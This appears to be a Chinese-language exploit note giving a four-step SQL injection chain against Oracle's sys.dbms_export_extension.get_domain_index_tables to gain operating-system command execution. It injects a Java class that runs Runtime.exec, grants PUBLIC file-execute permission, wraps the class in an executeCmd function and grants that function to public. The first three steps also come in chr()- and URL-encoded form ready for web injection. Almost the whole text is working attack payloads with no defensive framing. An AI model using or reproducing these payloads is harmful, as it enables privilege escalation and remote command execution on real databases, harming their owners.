利用sys.dbms_export_extension.get_domain_index_tables执行cmd: 

 ------------------------------------------------------------------------------------------------
http://notsosecure.com/folder2/ora_cmd_exec.txt  这些语句都是放在这里的。可以直接访问到:
 第一步:

and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''create or replace and compile java source named "PANGOLIN" as import java.io.*;public class PANGOLIN extends Object { public static String executeCmd(String cmdstring){  try{   BufferedReader myReader= new BufferedReader(    new InputStreamReader( Runtime.getRuntime().exec(cmdstring).getInputStream())   );   String stemp,str="";   while ((stemp = myReader.readLine()) != null)    str +=stemp+"\n";   myReader.close();return str;  }  catch (Exception e){   return e.toString();  } }}'';END;';END;--,SYS,0,1,0)and 1=1

 ************************ascii编码后就成下面的***********************************************

 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(99)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(112)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(32)%7C%7Cchr(99)%7C%7Cchr(111)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(111)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(100)%7C%7Cchr(32)%7C%7Cchr(34)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(71)%7C%7Cchr(79)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(34)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(105)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(46)%7C%7Cchr(42)%7C%7Cchr(59)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(98)%7C%7Cchr(108)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(32)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(115)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(71)%7C%7Cchr(79)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(79)%7C%7Cchr(98)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(98)%7C%7Cchr(108)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(32)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(40)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(99)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(41)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(121)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(66)%7C%7Cchr(117)%7C%7Cchr(102)%7C%7Cchr(102)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(100)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(109)%7C%7Cchr(121)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(61)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(119)%7C%7Cchr(32)%7C%7Cchr(66)%7C%7Cchr(117)%7C%7Cchr(102)%7C%7Cchr(102)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(100)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(40)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(119)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(110)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(40)%7C%7Cchr(32)%7C%7Cchr(82)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(46)%7C%7Cchr(103)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(82)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(46)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(40)%7C%7Cchr(99)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(41)%7C%7Cchr(46)%7C%7Cchr(103)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(73)%7C%7Cchr(110)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(41)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(44)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(61)%7C%7Cchr(34)%7C%7Cchr(34)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(119)%7C%7Cchr(104)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(40)%7C%7Cchr(40)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(32)%7C%7Cchr(61)%7C%7Cchr(32)%7C%7Cchr(109)%7C%7Cchr(121)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(46)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(76)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(41)%7C%7Cchr(32)%7C%7Cchr(33)%7C%7Cchr(61)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(117)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(41)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(43)%7C%7Cchr(61)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(43)%7C%7Cchr(34)%7C%7Cchr(92)%7C%7Cchr(110)%7C%7Cchr(34)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(109)%7C%7Cchr(121)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(46)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(125)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(99)%7C%7Cchr(104)%7C%7Cchr(32)%7C%7Cchr(40)%7C%7Cchr(69)%7C%7Cchr(120)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(112)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(41)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(46)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(125)%7C%7Cchr(9)%7C%7Cchr(125)%7C%7Cchr(125)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1 

 =======================================================================================

第二步:

 and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''begin dbms_java.grant_permission( ''''PUBLIC'''', ''''SYS:java.io.FilePermission'''', ''''<>'''', ''''execute'''' );end;'';END;';END;--,SYS,0,1,0) and 1=1
        **************************************************

 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(98)%7C%7Cchr(101)%7C%7Cchr(103)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(100)%7C%7Cchr(98)%7C%7Cchr(109)%7C%7Cchr(115)%7C%7Cchr(95)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(103)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(95)%7C%7Cchr(112)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(109)%7C%7Cchr(105)%7C%7Cchr(115)%7C%7Cchr(115)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(40)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(66)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(67)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(44)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(83)%7C%7Cchr(89)%7C%7Cchr(83)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(46)%7C%7Cchr(70)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(80)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(109)%7C%7Cchr(105)%7C%7Cchr(115)%7C%7Cchr(115)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(44)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(60)%7C%7Cchr(62)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(44)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(32)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(101)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1 

 ==========================================================================================

第三步:

 and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''create or replace function executeCmd(cmdstring in varchar2)  return varchar2  as language java name ''''PANGOLIN.executeCmd(java.lang.String) return String'''';'';END;';END;--,SYS,0,1,0) and 1=1

          *********************************************************

 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(99)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(112)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(102)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(40)%7C%7Cchr(99)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(99)%7C%7Cchr(104)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(50)%7C%7Cchr(41)%7C%7Cchr(32)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(99)%7C%7Cchr(104)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(50)%7C%7Cchr(32)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(117)%7C%7Cchr(97)%7C%7Cchr(103)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(71)%7C%7Cchr(79)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(46)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(40)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(46)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(41)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1 

    ==================================================================================

第四步:

  and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''grant all on executeCmd to public'';END;';END;--,SYS,0,1,0) and 1=1

